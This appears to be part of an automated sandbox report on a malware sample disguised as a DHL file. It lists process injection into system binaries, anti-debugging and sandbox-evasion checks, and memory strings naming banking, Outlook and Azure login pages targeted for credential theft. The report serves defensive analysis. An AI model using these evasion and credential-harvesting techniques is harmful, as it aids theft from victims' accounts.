Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: DHL 806-232024.exe

Static file information: File size 1208832 > 1048576

Source: DHL 806-232024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL 806-232024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL 806-232024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL 806-232024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL 806-232024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL 806-232024.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: DHL 806-232024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yAEEhNGBaPExAdMu.exe, 00000003.00000002.4529766745.00000000004DE000.00000002.00000001.01000000.00000004.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4529866987.00000000004DE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DHL 806-232024.exe, 00000000.00000003.2062085946.0000000003930000.00000004.00001000.00020000.00000000.sdmp, DHL 806-232024.exe, 00000000.00000003.2060906795.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2214449127.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115983541.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214449127.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2117729754.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000002.4530635872.00000000036A0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530635872.000000000383E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2216468139.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2214245032.000000000334A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4530981261.0000000003CCC000.00000004.10000000.00040000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530607885.00000000029AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2505119370.000000002961C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2181119157.000000000281A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2214208965.0000000002800000.00000004.00000020.00020000.00000000.sdmp, yAEEhNGBaPExAdMu.exe, 00000003.00000002.4530115940.00000000009C8000.00000004.00000020.00020000.00000000.sdmp

Source: DHL 806-232024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL 806-232024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL 806-232024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL 806-232024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL 806-232024.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0094C304 LoadLibraryA,GetProcAddress,

0_2_0094C304

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008F8B85 push ecx; ret	0_2_008F8B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003248A9 push esp; ret	2_2_003248AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033E2BA push 00000038h; iretd	2_2_0033E2BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033A436 push ebx; iretd	2_2_0033A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00338C92 pushad ; retf	2_2_00338C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0033A5D9 push ebx; iretd	2_2_0033A600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003347A2 push es; iretd	2_2_003347AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00323780 push eax; ret	2_2_00323782
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003217E5 push ebp; retf 003Fh	2_2_003217E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx	2_2_02F309B6
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031D36A8 pushfd ; retf	3_2_031D36D2
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031B3AED push esp; ret	3_2_031B3AEE
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031C981D push ebx; iretd	3_2_031C9844
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031D28BC push FFFFFFBAh; ret	3_2_031D28BE
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031C967A push ebx; iretd	3_2_031C9844
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031C7ED6 pushad ; retf	3_2_031C7ED7
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe	Code function: 3_2_031CD4FE push 00000038h; iretd	3_2_031CD502
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036D09AD push ecx; mov dword ptr [esp], ecx	4_2_036D09B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC2238 pushad ; iretd	4_2_02DC2239
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC101F push es; iretd	4_2_02DC1027
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DCD1B0 push es; ret	4_2_02DCD1D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DB1126 push esp; ret	4_2_02DB1127
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC550F pushad ; retf	4_2_02DC5510
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DCAB37 push 00000038h; iretd	4_2_02DCAB3B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DCFEF5 push FFFFFFBAh; ret	4_2_02DCFEF7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC0EAB push ebp; retf	4_2_02DC0EAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC6E56 push ebx; iretd	4_2_02DC6E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DBFFA0 push esi; iretd	4_2_02DBFFA5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DC6CB3 push ebx; iretd	4_2_02DC6E7D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035803DA push ebx; ret	4_2_0358042C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03584268 push cs; retf	4_2_035842F6

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_008D4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_008D4A35
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_009555FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_009555FD

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008F33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_008F33C7

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\DHL 806-232024.exe	API/Special instruction interceptor: Address: E5021C
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_02F7096E rdtsc

2_2_02F7096E

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9843

Jump to behavior

Source: C:\Users\user\Desktop\DHL 806-232024.exe	API coverage: 4.3 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084	Thread sleep count: 130 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084	Thread sleep time: -260000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084	Thread sleep count: 9843 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 1084	Thread sleep time: -19686000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe TID: 7064	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe TID: 7064	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exe TID: 7064	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00934696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00934696
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0093C9C7
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093C93C FindFirstFileW,FindClose,	0_2_0093C93C
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0093F200
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0093F35D
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0093F65E
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00933A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00933A2B
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00933D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00933D4E
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_0093BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0093BF27
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_02DCBAB0 FindFirstFileW,FindNextFileW,FindClose,	4_2_02DCBAB0

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_008D4AFE

Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: F56GKLK7U4.4.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: F56GKLK7U4.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 00000007.00000002.2506501902.0000025B694CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: F56GKLK7U4.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: F56GKLK7U4.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: F56GKLK7U4.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: F56GKLK7U4.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: F56GKLK7U4.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: F56GKLK7U4.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: F56GKLK7U4.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: netbtugc.exe, 00000004.00000002.4529839998.000000000320E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: F56GKLK7U4.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: F56GKLK7U4.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: F56GKLK7U4.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: yAEEhNGBaPExAdMu.exe, 00000006.00000002.4530170812.00000000008DF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: F56GKLK7U4.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: F56GKLK7U4.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_02F7096E rdtsc

2_2_02F7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00337823 LdrLoadDll,

2_2_00337823

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_009441FD BlockInput,

0_2_009441FD

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_008D3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_008D3B4C

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_00905CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00905CCC

Source: C:\Users\user\Desktop\DHL 806-232024.exe

Code function: 0_2_0094C304 LoadLibraryA,GetProcAddress,

0_2_0094C304

Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00E504E8 mov eax, dword ptr fs:[00000030h]	0_2_00E504E8
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00E50488 mov eax, dword ptr fs:[00000030h]	0_2_00E50488
Source: C:\Users\user\Desktop\DHL 806-232024.exe	Code function: 0_2_00E4EE48 mov eax, dword ptr fs:[00000030h]	0_2_00E4EE48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]	2_2_02F402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]	2_2_02F3A2C3
